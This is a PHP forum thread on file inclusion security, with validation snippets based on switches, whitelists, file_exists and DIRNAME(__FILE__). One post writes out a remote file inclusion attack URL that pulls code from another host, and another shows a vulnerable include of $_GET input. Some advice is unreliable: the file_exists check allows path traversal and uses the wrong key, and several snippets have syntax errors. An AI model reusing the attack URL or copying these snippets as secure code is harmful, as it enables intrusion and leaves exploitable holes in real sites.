Include "...."

[furn355]

Okay so the rumour is include () is not secure.

What are the alternatives I should be using? and why?

[iSOS]

"include()" is not in-secure. 0.o

[Zero-Affect]

I'm sorry where did someone say include isn't secure?

[LordDan]

It's only insecure if you're allowing user input to include a page, in which case, there is a number of ways to verify the page is valid..

1) Switches.. (Quick and easy for small numbers of pages)

if( isset( $_GET['page'] ) )
{
   switch( $_GET['page'] )
   {
       case 'page1': include( 'path/to/page1.php' ); break;
       case 'page2': include( 'path/to/page2.php' ); break;
       default: include( 'index.php' );
   }
}

 

2) List the valid pages in an array...

if( isset( $_GET['page'] ) )
{
   $pages = array( 'page1', 'page2', 'page3' );
   if( in_array( $_GET['page'], $pages ){
       include( $_GET['page'] .'.php' );
   }  else {
       include( 'index.php' );
  }
}

 

3) The file_exists way.. Put all pages that are allowed to be included by user input into a seperate dir..

if( isset( $_GET['page'] ) )
{
   if( file_exists( 'path/to/allowed/pages/'. $_GET['pages'] .'.php' ) {
       include(  'path/to/allowed/pages/'. $_GET['page'] .'.php' );
   } else {
       include( 'index.php' );
   }
}

 

Does this clear up your confusion? Includes/Requires are a very important part of PHP. As I said, they're only insecure if you do not validate a page which is being called in via user input, or by placing the page to include as a param in the web address. (example.com?page=pagename) :thumbup:

[Dayo]

include is secure unless you do something like

include $_GET['HACKME'].'.php';

[Danny696]

require is the only alternative i think

[LordDan]

require is the only alternative i think

They're the same and share the same need of user input validation.. The only difference is that Require() spits out an E_ERROR is the file doesn't exist.

Both of them are only insecure if you're allowing user input to include a page and you fail to validate them.

[furn355]

It was too my understanding, if someone is using say :

include "globals.php";

I could make a text file which included the insides of global.php on another server which would also contain a function of some variety to achieve my means,

then run something like :

http://domain/index.php?page=http://domain2/code.txt

where his script would then run? :S No?

[LordDan]

It was too my understanding, if someone is using say :

include "globals.php";

I could make a text file which included the insides of global.php on another server which would also contain a function of some variety to achieve my means,

then run something like :

http://domain/index.php?page=http://domain2/code.txt

where his script would then run? :S No?

If I remember correctly, this can only happen if you have something like "allow_url_include" or some similar setting in PHP INI enabled, by default, it should be disabled for security

If you wish to test, try and include a page on your own server but include the full address "http://www.yoursite.com/globals.php" you "should" get something like

 

Warning: include() [function.include]: http:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\xampp\htdocs\temp\prev0~.php on line 9

Warning: include([url]http://www.google.com/globals.php[/url]) [function.include]: failed to open stream: no suitable wrapper could be found in C:\xampp\htdocs\temp\prev0~.php on line 9

Warning: include() [function.include]: Failed opening 'http://www.google.com/globals.php' for inclusion (include_path='.;C:\xampp\php\PEAR') in C:\xampp\htdocs\temp\prev0~.php on line 9

Tested on google..

[Zero-Affect]

i use something very like this

if( isset( $_GET['page'] ) ) {
   $pages = array( 'page1', 'page2', 'page3' );
   if( in_array( $_GET['page'], $pages ){
       include( $_GET['page'] .'.php' );
   }  else {
       include( 'index.php' );
  }

but mines more like

	$file_array = array(
	'files/file1.php',
	'files/file2.php'
);
	$_GET['page'] = ( isset($_GET['page']) && in_array($_GET['page'], $file_array) ) ? basename(str_replace('.php', '', $_GET['page'])) : 'file1' ;
# File Inclusion (Start)
 foreach ( $file_array as $value) {
  if ( $_GET['page'] == $value ) {
include_once (DIRNAME(__FILE__) . '/' . $value);
  }
 }
# File Inclusion (End)

This may not work i edited it since im not giving out my entire index.php file ( basically 50 lines in my index file).

[furn355]

Its given me something to think about,

thanks zero & lord dan

[DigitalGerm]

Okay so we all know include is not secure.

I didn't know that ?

With $_GET, I use the switch statement that LordDan provided simple to add new rules and actions.

I don't think you can Include a file from another server simply using include and http:// ... because the server will try to find it locally.

[Guest]

i use something very like this

if( isset( $_GET['page'] ) ) {
   $pages = array( 'page1', 'page2', 'page3' );
   if( in_array( $_GET['page'], $pages ){
       include( $_GET['page'] .'.php' );
   }  else {
       include( 'index.php' );
  }

but mines more like

	$file_array = array(
	'files/file1.php',
	'files/file2.php'
);
	$_GET['page'] = ( isset($_GET['page']) && in_array($_GET['page'], $file_array) ) ? basename(str_replace('.php', '', $_GET['page'])) : 'file1' ;
# File Inclusion (Start)
 foreach ( $file_array as $value) {
  if ( $_GET['page'] == $value ) {
include_once (DIRNAME(__FILE__) . '/' . $value);
  }
 }
# File Inclusion (End)

This may not work i edited it since im not giving out my entire index.php file ( basically 50 lines in my index file).

Zero Again? :P no need for the foreach() -.-

Here maybe? :P

$pages = array
(
        'Explore' => 'city',
        'Home'    => 'index'
);
$keys  = array_keys($pages);
$page = isset($_GET['page']) && is_string($_GET['page']) && preg_match("`^((". implode(")|(", $keys) ."))$`ims", $_GET['page']) ? strtolower($_GET['page']) : array_shift($keys);
include dirname(__FILE__) .'/'. $pages[$page] .'.php';

:O?

);

[Zero-Affect]

good point i think im obsessed with foreach lol

Mine is a little different to what i posted anyway i do use key and value in the array because i use the key for the title... anyways lol

[Dillion & Amanda 4 Lif]

Ahh because if you didnt, based on your layout you'd have to go to every single page/function and add a title, but this way it does it for you @zero

[Zero-Affect]

my array is a little more complex

$example_array(
'file1' => 'file1.php',
'file2' => 'file2.php''
);

then later i use something similar to what i coded up a long time ago on here to grab the title name from page _GET then strip any unwanted characters and put into the right places. It's actually quite an amazing little setup.

[Diesl]

Just wondering,

why are people using

include(DIRNAME(__FILE__) . '/whateverpage.php');

 

instead of the default

include "whateverpage.php";

 

?

I've seen it on a quite a few mods and I'm not sure of its reasoning.

[Jordan Palmer]

I use it as it looks cleaner :), Its pretty secure too? I'm not sure the story behind it, jst what I was told basically

[Zeggy]

You use __FILE__ to help in this kind of situation:

You call file1.php, which has a line to include 'subfolder/file2.php'.

file2.php also has a line to include 'file3.php'.

Now, where will PHP look for file3.php? In the root folder, since that is where file1.php is, or inside subfolder/, since that is where file2.php is?

When you have lots of includes in many different folders, this can get very confusing and you could make many mistakes, or even make your entire file system unusable in your script.

 

You can be consistent with includes if you use DIRNAME(__FILE__): it will always include the file from the same folder as the included file. So in this situation, it will include 'subfolder/file3.php'.